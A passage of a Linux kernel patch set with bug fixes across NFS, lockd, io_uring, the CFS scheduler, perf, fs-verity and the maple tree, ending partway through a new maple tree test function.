+@@ -33,6 +33,17 @@ loff_t_to_s64(loff_t offset)
+ 	return res;
+ }
+ 
++void nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len)
++{
++	s64 end = off + len - 1;
++
++	fl->fl_start = off;
++	if (len == 0 || end < 0)
++		fl->fl_end = OFFSET_MAX;
++	else
++		fl->fl_end = end;
++}
++
+ /*
+  * NLM file handles are defined by specification to be a variable-length
+  * XDR opaque no longer than 1024 bytes. However, this implementation
+@@ -80,7 +91,7 @@ svcxdr_decode_lock(struct xdr_stream *xdr, struct nlm_lock *lock)
+ 	locks_init_lock(fl);
+ 	fl->fl_flags = FL_POSIX;
+ 	fl->fl_type  = F_RDLCK;
+-
++	nlm4svc_set_file_lock_range(fl, lock->lock_start, lock->lock_len);
+ 	return true;
+ }
+ 
+diff --git a/fs/nfs/dir.c b/fs/nfs/dir.c
+index f7e4a88d5d929..e28dd6475e390 100644
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -3089,7 +3089,6 @@ static void nfs_access_add_rbtree(struct inode *inode,
+ 		else
+ 			goto found;
+ 	}
+-	set->timestamp = ktime_get_ns();
+ 	rb_link_node(&set->rb_node, parent, p);
+ 	rb_insert_color(&set->rb_node, root_node);
+ 	list_add_tail(&set->lru, &nfsi->access_cache_entry_lru);
+@@ -3114,6 +3113,7 @@ void nfs_access_add_cache(struct inode *inode, struct nfs_access_entry *set,
+ 	cache->fsgid = cred->fsgid;
+ 	cache->group_info = get_group_info(cred->group_info);
+ 	cache->mask = set->mask;
++	cache->timestamp = ktime_get_ns();
+ 
+ 	/* The above field assignments must be visible
+ 	 * before this item appears on the lru.  We cannot easily
+diff --git a/fs/nfs/read.c b/fs/nfs/read.c
+index 8ae2c8d1219d8..cd970ce62786b 100644
+--- a/fs/nfs/read.c
++++ b/fs/nfs/read.c
+@@ -15,6 +15,7 @@
+ #include <linux/stat.h>
+ #include <linux/mm.h>
+ #include <linux/slab.h>
++#include <linux/task_io_accounting_ops.h>
+ #include <linux/pagemap.h>
+ #include <linux/sunrpc/clnt.h>
+ #include <linux/nfs_fs.h>
+@@ -338,6 +339,7 @@ int nfs_read_folio(struct file *file, struct folio *folio)
+ 
+ 	trace_nfs_aop_readpage(inode, page);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGE);
++	task_io_account_read(folio_size(folio));
+ 
+ 	/*
+ 	 * Try to flush any pending writes to the file..
+@@ -400,6 +402,7 @@ void nfs_readahead(struct readahead_control *ractl)
+ 
+ 	trace_nfs_aop_readahead(inode, readahead_pos(ractl), nr_pages);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGES);
++	task_io_account_read(readahead_length(ractl));
+ 
+ 	ret = -ESTALE;
+ 	if (NFS_STALE(inode))
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index bb1e85586dfdd..5308070a47f38 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -937,8 +937,15 @@ nfsd_splice_actor(struct pipe_inode_info *pipe, struct pipe_buffer *buf,
+ 	struct page *last_page;
+ 
+ 	last_page = page + (offset + sd->len - 1) / PAGE_SIZE;
+-	for (page += offset / PAGE_SIZE; page <= last_page; page++)
++	for (page += offset / PAGE_SIZE; page <= last_page; page++) {
++		/*
++		 * Skip page replacement when extending the contents
++		 * of the current page.
++		 */
++		if (page == *(rqstp->rq_next_page - 1))
++			continue;
+ 		svc_rqst_replace_page(rqstp, page);
++	}
+ 	if (rqstp->rq_res.page_len == 0)	// first call
+ 		rqstp->rq_res.page_base = offset % PAGE_SIZE;
+ 	rqstp->rq_res.page_len += sd->len;
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index b4041d0566a9a..ef9f9a2511b72 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -71,7 +71,7 @@ static int nilfs_ioctl_wrap_copy(struct the_nilfs *nilfs,
+ 	if (argv->v_index > ~(__u64)0 - argv->v_nmembs)
+ 		return -EINVAL;
+ 
+-	buf = (void *)__get_free_pages(GFP_NOFS, 0);
++	buf = (void *)get_zeroed_page(GFP_NOFS);
+ 	if (unlikely(!buf))
+ 		return -ENOMEM;
+ 	maxmembs = PAGE_SIZE / argv->v_size;
+diff --git a/fs/super.c b/fs/super.c
+index cf737ec2bd05c..e35f601eee298 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -476,13 +476,22 @@ void generic_shutdown_super(struct super_block *sb)
+ 
+ 		cgroup_writeback_umount();
+ 
+-		/* evict all inodes with zero refcount */
++		/* Evict all inodes with zero refcount. */
+ 		evict_inodes(sb);
+-		/* only nonzero refcount inodes can have marks */
++
++		/*
++		 * Clean up and evict any inodes that still have references due
++		 * to fsnotify or the security policy.
++		 */
+ 		fsnotify_sb_delete(sb);
+-		fscrypt_destroy_keyring(sb);
+ 		security_sb_delete(sb);
+ 
++		/*
++		 * Now that all potentially-encrypted inodes have been evicted,
++		 * the fscrypt keyring can be destroyed.
++		 */
++		fscrypt_destroy_keyring(sb);
++
+ 		if (sb->s_dio_done_wq) {
+ 			destroy_workqueue(sb->s_dio_done_wq);
+ 			sb->s_dio_done_wq = NULL;
+diff --git a/fs/verity/verify.c b/fs/verity/verify.c
+index 961ba248021f9..ffac380bd8885 100644
+--- a/fs/verity/verify.c
++++ b/fs/verity/verify.c
+@@ -269,15 +269,15 @@ EXPORT_SYMBOL_GPL(fsverity_enqueue_verify_work);
+ int __init fsverity_init_workqueue(void)
+ {
+ 	/*
+-	 * Use an unbound workqueue to allow bios to be verified in parallel
+-	 * even when they happen to complete on the same CPU.  This sacrifices
+-	 * locality, but it's worthwhile since hashing is CPU-intensive.
++	 * Use a high-priority workqueue to prioritize verification work, which
++	 * blocks reads from completing, over regular application tasks.
+ 	 *
+-	 * Also use a high-priority workqueue to prioritize verification work,
+-	 * which blocks reads from completing, over regular application tasks.
++	 * For performance reasons, don't use an unbound workqueue.  Using an
++	 * unbound workqueue for crypto operations causes excessive scheduler
++	 * latency on ARM64.
+ 	 */
+ 	fsverity_read_workqueue = alloc_workqueue("fsverity_read_queue",
+-						  WQ_UNBOUND | WQ_HIGHPRI,
++						  WQ_HIGHPRI,
+ 						  num_online_cpus());
+ 	if (!fsverity_read_workqueue)
+ 		return -ENOMEM;
+diff --git a/include/linux/acpi_mdio.h b/include/linux/acpi_mdio.h
+index 0a24ab7cb66fa..8e2eefa9fbc0f 100644
+--- a/include/linux/acpi_mdio.h
++++ b/include/linux/acpi_mdio.h
+@@ -9,7 +9,14 @@
+ #include <linux/phy.h>
+ 
+ #if IS_ENABLED(CONFIG_ACPI_MDIO)
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode);
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner);
++
++static inline int
++acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *handle)
++{
++	return __acpi_mdiobus_register(mdio, handle, THIS_MODULE);
++}
+ #else /* CONFIG_ACPI_MDIO */
+ static inline int
+ acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index d4afa8508a806..3a7909ed54980 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -96,6 +96,7 @@ static inline void user_exit_irqoff(void) { }
+ static inline int exception_enter(void) { return 0; }
+ static inline void exception_exit(enum ctx_state prev_ctx) { }
+ static inline int ct_state(void) { return -1; }
++static inline int __ct_state(void) { return -1; }
+ static __always_inline bool context_tracking_guest_enter(void) { return false; }
+ static inline void context_tracking_guest_exit(void) { }
+ #define CT_WARN_ON(cond) do { } while (0)
+diff --git a/include/linux/context_tracking_state.h b/include/linux/context_tracking_state.h
+index 4a4d56f771802..fdd537ea513ff 100644
+--- a/include/linux/context_tracking_state.h
++++ b/include/linux/context_tracking_state.h
+@@ -46,7 +46,9 @@ struct context_tracking {
+ 
+ #ifdef CONFIG_CONTEXT_TRACKING
+ DECLARE_PER_CPU(struct context_tracking, context_tracking);
++#endif
+ 
++#ifdef CONFIG_CONTEXT_TRACKING_USER
+ static __always_inline int __ct_state(void)
+ {
+ 	return arch_atomic_read(this_cpu_ptr(&context_tracking.state)) & CT_STATE_MASK;
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 98598bd1d2fa5..ac22f7ca195a4 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -688,6 +688,7 @@ efi_guid_to_str(efi_guid_t *guid, char *out)
+ }
+ 
+ extern void efi_init (void);
++extern void efi_earlycon_reprobe(void);
+ #ifdef CONFIG_EFI
+ extern void efi_enter_virtual_mode (void);	/* switch EFI to virtual mode, if possible */
+ #else
+diff --git a/include/linux/io_uring.h b/include/linux/io_uring.h
+index 934e5dd4ccc08..35b9328ca3352 100644
+--- a/include/linux/io_uring.h
++++ b/include/linux/io_uring.h
+@@ -27,7 +27,7 @@ struct io_uring_cmd {
+ 	const void	*cmd;
+ 	union {
+ 		/* callback to defer completions to task context */
+-		void (*task_work_cb)(struct io_uring_cmd *cmd);
++		void (*task_work_cb)(struct io_uring_cmd *cmd, unsigned);
+ 		/* used for polled completion */
+ 		void *cookie;
+ 	};
+@@ -39,9 +39,10 @@ struct io_uring_cmd {
+ #if defined(CONFIG_IO_URING)
+ int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 			      struct iov_iter *iter, void *ioucmd);
+-void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2);
++void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2,
++			unsigned issue_flags);
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *));
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned));
+ struct sock *io_uring_get_socket(struct file *file);
+ void __io_uring_cancel(bool cancel_all);
+ void __io_uring_free(struct task_struct *tsk);
+@@ -72,11 +73,11 @@ static inline int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 	return -EOPNOTSUPP;
+ }
+ static inline void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret,
+-		ssize_t ret2)
++		ssize_t ret2, unsigned issue_flags)
+ {
+ }
+ static inline void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ }
+ static inline struct sock *io_uring_get_socket(struct file *file)
+diff --git a/include/linux/lockd/xdr4.h b/include/linux/lockd/xdr4.h
+index 9a6b55da8fd64..72831e35dca32 100644
+--- a/include/linux/lockd/xdr4.h
++++ b/include/linux/lockd/xdr4.h
+@@ -22,6 +22,7 @@
+ #define	nlm4_fbig		cpu_to_be32(NLM_FBIG)
+ #define	nlm4_failed		cpu_to_be32(NLM_FAILED)
+ 
++void	nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len);
+ bool	nlm4svc_decode_void(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_testargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_lockargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+diff --git a/include/linux/nvme-tcp.h b/include/linux/nvme-tcp.h
+index 75470159a194d..57ebe1267f7fb 100644
+--- a/include/linux/nvme-tcp.h
++++ b/include/linux/nvme-tcp.h
+@@ -115,8 +115,9 @@ struct nvme_tcp_icresp_pdu {
+ struct nvme_tcp_term_pdu {
+ 	struct nvme_tcp_hdr	hdr;
+ 	__le16			fes;
+-	__le32			fei;
+-	__u8			rsvd[8];
++	__le16			feil;
++	__le16			feiu;
++	__u8			rsvd[10];
+ };
+ 
+ /**
+diff --git a/include/linux/of_mdio.h b/include/linux/of_mdio.h
+index da633d34ab866..8a52ef2e6fa6b 100644
+--- a/include/linux/of_mdio.h
++++ b/include/linux/of_mdio.h
+@@ -14,9 +14,25 @@
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ bool of_mdiobus_child_is_phy(struct device_node *child);
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np);
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np);
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner);
++
++static inline int of_mdiobus_register(struct mii_bus *mdio,
++				      struct device_node *np)
++{
++	return __of_mdiobus_register(mdio, np, THIS_MODULE);
++}
++
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner);
++
++static inline int devm_of_mdiobus_register(struct device *dev,
++					   struct mii_bus *mdio,
++					   struct device_node *np)
++{
++	return __devm_of_mdiobus_register(dev, mdio, np, THIS_MODULE);
++}
++
+ struct mdio_device *of_mdio_find_device(struct device_node *np);
+ struct phy_device *of_phy_find_device(struct device_node *phy_np);
+ struct phy_device *
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index a152678b82b71..a2414c1874837 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -215,7 +215,7 @@ struct plat_stmmacenet_data {
+ 	int unicast_filter_entries;
+ 	int tx_fifo_size;
+ 	int rx_fifo_size;
+-	u32 addr64;
++	u32 host_dma_width;
+ 	u32 rx_queues_to_use;
+ 	u32 tx_queues_to_use;
+ 	u8 rx_sched_algorithm;
+diff --git a/include/linux/sysfb.h b/include/linux/sysfb.h
+index 8ba8b5be55675..c1ef5fc60a3cb 100644
+--- a/include/linux/sysfb.h
++++ b/include/linux/sysfb.h
+@@ -70,11 +70,16 @@ static inline void sysfb_disable(void)
+ #ifdef CONFIG_EFI
+ 
+ extern struct efifb_dmi_info efifb_dmi_list[];
+-void sysfb_apply_efi_quirks(struct platform_device *pd);
++void sysfb_apply_efi_quirks(void);
++void sysfb_set_efifb_fwnode(struct platform_device *pd);
+ 
+ #else /* CONFIG_EFI */
+ 
+-static inline void sysfb_apply_efi_quirks(struct platform_device *pd)
++static inline void sysfb_apply_efi_quirks(void)
++{
++}
++
++static inline void sysfb_set_efifb_fwnode(struct platform_device *pd)
+ {
+ }
+ 
+diff --git a/io_uring/filetable.c b/io_uring/filetable.c
+index 68dfc6936aa72..b80614e7d6051 100644
+--- a/io_uring/filetable.c
++++ b/io_uring/filetable.c
+@@ -19,6 +19,9 @@ static int io_file_bitmap_get(struct io_ring_ctx *ctx)
+ 	unsigned long nr = ctx->file_alloc_end;
+ 	int ret;
+ 
++	if (!table->bitmap)
++		return -ENFILE;
++
+ 	do {
+ 		ret = find_next_zero_bit(table->bitmap, nr, table->alloc_hint);
+ 		if (ret != nr)
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 02587f7d5908d..d474cad6abfba 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -47,6 +47,7 @@ struct io_connect {
+ 	struct sockaddr __user		*addr;
+ 	int				addr_len;
+ 	bool				in_progress;
++	bool				seen_econnaborted;
+ };
+ 
+ struct io_sr_msg {
+@@ -1431,7 +1432,7 @@ int io_connect_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 
+ 	conn->addr = u64_to_user_ptr(READ_ONCE(sqe->addr));
+ 	conn->addr_len =  READ_ONCE(sqe->addr2);
+-	conn->in_progress = false;
++	conn->in_progress = conn->seen_econnaborted = false;
+ 	return 0;
+ }
+ 
+@@ -1468,18 +1469,24 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	ret = __sys_connect_file(req->file, &io->address,
+ 					connect->addr_len, file_flags);
+-	if ((ret == -EAGAIN || ret == -EINPROGRESS) && force_nonblock) {
++	if ((ret == -EAGAIN || ret == -EINPROGRESS || ret == -ECONNABORTED)
++	    && force_nonblock) {
+ 		if (ret == -EINPROGRESS) {
+ 			connect->in_progress = true;
+-		} else {
+-			if (req_has_async_data(req))
+-				return -EAGAIN;
+-			if (io_alloc_async_data(req)) {
+-				ret = -ENOMEM;
++			return -EAGAIN;
++		}
++		if (ret == -ECONNABORTED) {
++			if (connect->seen_econnaborted)
+ 				goto out;
+-			}
+-			memcpy(req->async_data, &__io, sizeof(__io));
++			connect->seen_econnaborted = true;
++		}
++		if (req_has_async_data(req))
++			return -EAGAIN;
++		if (io_alloc_async_data(req)) {
++			ret = -ENOMEM;
++			goto out;
+ 		}
++		memcpy(req->async_data, &__io, sizeof(__io));
+ 		return -EAGAIN;
+ 	}
+ 	if (ret == -ERESTARTSYS)
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 4cbf3ad725d13..4ccfc29216269 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -794,6 +794,7 @@ void __io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	}
+ #endif
+ 	io_free_file_tables(&ctx->file_table);
++	io_file_table_set_alloc_range(ctx, 0, 0);
+ 	io_rsrc_data_free(ctx->file_data);
+ 	ctx->file_data = NULL;
+ 	ctx->nr_user_files = 0;
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index 2e4c483075d33..9a1dee5718724 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -15,12 +15,13 @@
+ static void io_uring_cmd_work(struct io_kiocb *req, bool *locked)
+ {
+ 	struct io_uring_cmd *ioucmd = io_kiocb_to_cmd(req, struct io_uring_cmd);
++	unsigned issue_flags = *locked ? 0 : IO_URING_F_UNLOCKED;
+ 
+-	ioucmd->task_work_cb(ioucmd);
++	ioucmd->task_work_cb(ioucmd, issue_flags);
+ }
+ 
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -42,7 +43,8 @@ static inline void io_req_set_cqe32_extra(struct io_kiocb *req,
+  * Called by consumers of io_uring_cmd, if they originally returned
+  * -EIOCBQUEUED upon receiving the command.
+  */
+-void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
++void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2,
++		       unsigned issue_flags)
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -56,7 +58,7 @@ void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
+ 		/* order with io_iopoll_req_issued() checking ->iopoll_complete */
+ 		smp_store_release(&req->iopoll_completed, 1);
+ 	else
+-		io_req_complete_post(req, 0);
++		io_req_complete_post(req, issue_flags);
+ }
+ EXPORT_SYMBOL_GPL(io_uring_cmd_done);
+ 
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index f9c3b1033ec39..00d25e8ea9e3c 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -971,7 +971,7 @@ static int __init bpf_jit_charge_init(void)
+ {
+ 	/* Only used as heuristic here to derive limit. */
+ 	bpf_jit_limit_max = bpf_jit_alloc_exec_limit();
+-	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 2,
++	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 1,
+ 					    PAGE_SIZE), LONG_MAX);
+ 	return 0;
+ }
+diff --git a/kernel/entry/common.c b/kernel/entry/common.c
+index 846add8394c41..be61332c66b54 100644
+--- a/kernel/entry/common.c
++++ b/kernel/entry/common.c
+@@ -21,7 +21,7 @@ static __always_inline void __enter_from_user_mode(struct pt_regs *regs)
+ 	arch_enter_from_user_mode(regs);
+ 	lockdep_hardirqs_off(CALLER_ADDR0);
+ 
+-	CT_WARN_ON(ct_state() != CONTEXT_USER);
++	CT_WARN_ON(__ct_state() != CONTEXT_USER);
+ 	user_exit_irqoff();
+ 
+ 	instrumentation_begin();
+@@ -192,13 +192,14 @@ static unsigned long exit_to_user_mode_loop(struct pt_regs *regs,
+ 
+ static void exit_to_user_mode_prepare(struct pt_regs *regs)
+ {
+-	unsigned long ti_work = read_thread_flags();
++	unsigned long ti_work;
+ 
+ 	lockdep_assert_irqs_disabled();
+ 
+ 	/* Flush pending rcuog wakeup before the last need_resched() check */
+ 	tick_nohz_user_enter_prepare();
+ 
++	ti_work = read_thread_flags();
+ 	if (unlikely(ti_work & EXIT_TO_USER_MODE_WORK))
+ 		ti_work = exit_to_user_mode_loop(regs, ti_work);
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 8ae8a5055e205..fad170b475921 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -3872,7 +3872,7 @@ ctx_sched_in(struct perf_event_context *ctx, enum event_type_t event_type)
+ 	if (likely(!ctx->nr_events))
+ 		return;
+ 
+-	if (is_active ^ EVENT_TIME) {
++	if (!(is_active & EVENT_TIME)) {
+ 		/* start ctx time */
+ 		__update_context_time(ctx, false);
+ 		perf_cgroup_set_timestamp(cpuctx);
+@@ -9163,7 +9163,7 @@ static void perf_event_bpf_output(struct perf_event *event, void *data)
+ 
+ 	perf_event_header__init_id(&bpf_event->event_id.header,
+ 				   &sample, event);
+-	ret = perf_output_begin(&handle, data, event,
++	ret = perf_output_begin(&handle, &sample, event,
+ 				bpf_event->event_id.header.size);
+ 	if (ret)
+ 		return;
+diff --git a/kernel/kcsan/Makefile b/kernel/kcsan/Makefile
+index 8cf70f068d92d..a45f3dfc8d141 100644
+--- a/kernel/kcsan/Makefile
++++ b/kernel/kcsan/Makefile
+@@ -16,6 +16,6 @@ obj-y := core.o debugfs.o report.o
+ KCSAN_INSTRUMENT_BARRIERS_selftest.o := y
+ obj-$(CONFIG_KCSAN_SELFTEST) += selftest.o
+ 
+-CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -g -fno-omit-frame-pointer
++CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -fno-omit-frame-pointer
+ CFLAGS_kcsan_test.o += $(DISABLE_STRUCTLEAK_PLUGIN)
+ obj-$(CONFIG_KCSAN_KUNIT_TEST) += kcsan_test.o
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 2a4918a1faa9e..9a0698353d60f 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2082,6 +2082,9 @@ static inline void dequeue_task(struct rq *rq, struct task_struct *p, int flags)
+ 
+ void activate_task(struct rq *rq, struct task_struct *p, int flags)
+ {
++	if (task_on_rq_migrating(p))
++		flags |= ENQUEUE_MIGRATED;
++
+ 	enqueue_task(rq, p, flags);
+ 
+ 	p->on_rq = TASK_ON_RQ_QUEUED;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 0f87369914274..e046a2bff207b 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4652,6 +4652,29 @@ static void check_spread(struct cfs_rq *cfs_rq, struct sched_entity *se)
+ #endif
+ }
+ 
++static inline bool entity_is_long_sleeper(struct sched_entity *se)
++{
++	struct cfs_rq *cfs_rq;
++	u64 sleep_time;
++
++	if (se->exec_start == 0)
++		return false;
++
++	cfs_rq = cfs_rq_of(se);
++
++	sleep_time = rq_clock_task(rq_of(cfs_rq));
++
++	/* Happen while migrating because of clock task divergence */
++	if (sleep_time <= se->exec_start)
++		return false;
++
++	sleep_time -= se->exec_start;
++	if (sleep_time > ((1ULL << 63) / scale_load_down(NICE_0_LOAD)))
++		return true;
++
++	return false;
++}
++
+ static void
+ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ {
+@@ -4685,8 +4708,29 @@ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ 		vruntime -= thresh;
+ 	}
+ 
+-	/* ensure we never gain time by being placed backwards. */
+-	se->vruntime = max_vruntime(se->vruntime, vruntime);
++	/*
++	 * Pull vruntime of the entity being placed to the base level of
++	 * cfs_rq, to prevent boosting it if placed backwards.
++	 * However, min_vruntime can advance much faster than real time, with
++	 * the extreme being when an entity with the minimal weight always runs
++	 * on the cfs_rq. If the waking entity slept for a long time, its
++	 * vruntime difference from min_vruntime may overflow s64 and their
++	 * comparison may get inversed, so ignore the entity's original
++	 * vruntime in that case.
++	 * The maximal vruntime speedup is given by the ratio of normal to
++	 * minimal weight: scale_load_down(NICE_0_LOAD) / MIN_SHARES.
++	 * When placing a migrated waking entity, its exec_start has been set
++	 * from a different rq. In order to take into account a possible
++	 * divergence between new and prev rq's clocks task because of irq and
++	 * stolen time, we take an additional margin.
++	 * So, cutting off on the sleep time of
++	 *     2^63 / scale_load_down(NICE_0_LOAD) ~ 104 days
++	 * should be safe.
++	 */
++	if (entity_is_long_sleeper(se))
++		se->vruntime = vruntime;
++	else
++		se->vruntime = max_vruntime(se->vruntime, vruntime);
+ }
+ 
+ static void check_enqueue_throttle(struct cfs_rq *cfs_rq);
+@@ -4763,6 +4807,9 @@ enqueue_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
+ 
+ 	if (flags & ENQUEUE_WAKEUP)
+ 		place_entity(cfs_rq, se, 0);
++	/* Entity has migrated, no longer consider this task hot */
++	if (flags & ENQUEUE_MIGRATED)
++		se->exec_start = 0;
+ 
+ 	check_schedstat_required();
+ 	update_stats_enqueue_fair(cfs_rq, se, flags);
+@@ -7465,9 +7512,6 @@ static void migrate_task_rq_fair(struct task_struct *p, int new_cpu)
+ 	/* Tell new CPU we are migrated */
+ 	se->avg.last_update_time = 0;
+ 
+-	/* We have migrated, no longer consider this task hot */
+-	se->exec_start = 0;
+-
+ 	update_scan_period(p, new_cpu);
+ }
+ 
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index c4945f8adc119..2f37a6e68aa9f 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -339,7 +339,7 @@ static void move_to_next_cpu(void)
+ 	cpumask_clear(current_mask);
+ 	cpumask_set_cpu(next_cpu, current_mask);
+ 
+-	sched_setaffinity(0, current_mask);
++	set_cpus_allowed_ptr(current, current_mask);
+ 	return;
+ 
+  change_mode:
+@@ -446,7 +446,7 @@ static int start_single_kthread(struct trace_array *tr)
+ 
+ 	}
+ 
+-	sched_setaffinity(kthread->pid, current_mask);
++	set_cpus_allowed_ptr(kthread, current_mask);
+ 
+ 	kdata->kthread = kthread;
+ 	wake_up_process(kthread);
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 5a976393c9aea..a63594bef72ea 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5093,35 +5093,21 @@ static inline bool mas_rewind_node(struct ma_state *mas)
+  */
+ static inline bool mas_skip_node(struct ma_state *mas)
+ {
+-	unsigned char slot, slot_count;
+-	unsigned long *pivots;
+-	enum maple_type mt;
++	if (mas_is_err(mas))
++		return false;
+ 
+-	mt = mte_node_type(mas->node);
+-	slot_count = mt_slots[mt] - 1;
+ 	do {
+ 		if (mte_is_root(mas->node)) {
+-			slot = mas->offset;
+-			if (slot > slot_count) {
++			if (mas->offset >= mas_data_end(mas)) {
+ 				mas_set_err(mas, -EBUSY);
+ 				return false;
+ 			}
+ 		} else {
+ 			mas_ascend(mas);
+-			slot = mas->offset;
+-			mt = mte_node_type(mas->node);
+-			slot_count = mt_slots[mt] - 1;
+ 		}
+-	} while (slot > slot_count);
+-
+-	mas->offset = ++slot;
+-	pivots = ma_pivots(mas_mn(mas), mt);
+-	if (slot > 0)
+-		mas->min = pivots[slot - 1] + 1;
+-
+-	if (slot <= slot_count)
+-		mas->max = pivots[slot];
++	} while (mas->offset >= mas_data_end(mas));
+ 
++	mas->offset++;
+ 	return true;
+ }
+ 
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index ec847bf4dcb4d..f7364b9fee939 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2602,6 +2602,49 @@ static noinline void check_empty_area_window(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
++static noinline void check_empty_area_fill(struct maple_tree *mt)
++{
++	const unsigned long max = 0x25D78000;
++	unsigned long size;
++	int loop, shift;
++	MA_STATE(mas, mt, 0, 0);
++
++	mt_set_non_kernel(99999);
++	for (shift = 12; shift <= 16; shift++) {
++		loop = 5000;
++		size = 1 << shift;
++		while (loop--) {
++			mas_set(&mas, 0);
++			mas_lock(&mas);
++			MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != 0);
++			MT_BUG_ON(mt, mas.last != mas.index + size - 1);
++			mas_store_gfp(&mas, (void *)size, GFP_KERNEL);
++			mas_unlock(&mas);
++			mas_reset(&mas);
++		}
++	}
++
++	/* No space left. */
++	size = 0x1000;
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != -EBUSY);
++	rcu_read_unlock();
++
++	/* Fill a depth 3 node to the maximum */
++	for (unsigned long i = 629440511; i <= 629440800; i += 6)
++		mtree_store_range(mt, i, i + 5, (void *)i, GFP_KERNEL);
++	/* Make space in the second-last depth 4 node */
++	mtree_erase(mt, 631668735);
++	/* Make space in the last depth 4 node */
++	mtree_erase(mt, 629506047);
++	mas_reset(&mas);
++	/* Search from just after the gap in the second-last depth 4 */
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 629506048, 690000000, 0x5000) != 0);
++	rcu_read_unlock();
++	mt_set_non_kernel(0);
